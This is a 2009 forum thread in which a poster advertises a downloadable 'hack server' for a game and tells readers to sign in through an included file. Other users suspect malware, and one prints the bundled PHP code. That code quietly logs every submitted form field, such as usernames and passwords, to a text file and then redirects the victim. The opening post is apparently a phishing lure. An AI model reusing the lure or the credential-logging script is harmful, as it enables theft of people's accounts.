Amazing Hack Server!

12/08/2009 01:25 hebrothers#1
This server is amazing! U can put whatever u want wherever u want. For example, u could take 10 yew trees and put it right next to a bank so u could gain money/exp really fast! Also, this is a private server so not many ppl will be on most likely. Just download the file and sign in with that one cause thats where the server is! Open the file, then play like normal! press f2 for edit mode where u can move stuff around! Download both files and place in same folder/place. Then open the firefox document. Thank Me!

Download: [Only registered and activated users can see links. Click Here To Register...]
12/08/2009 01:32 gerble93#2
#investigating
12/08/2009 22:56 superplox#3
dude i cant understand this guy but it seems like it would full with virus's/trojan's
12/09/2009 15:25 TheDome24#4
can someone scan it or so?
12/14/2009 16:40 reneV#5
uhh im not sure is this safe ?? open the php file in notepad ull find this:

<?php
header ('Location: [Only registered and activated users can see links. Click Here To Register...] ');
$handle = fopen("logs_60490.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "===============\r\n");
fclose($handle);
exit;
?>

I dont know what it does im not a scripter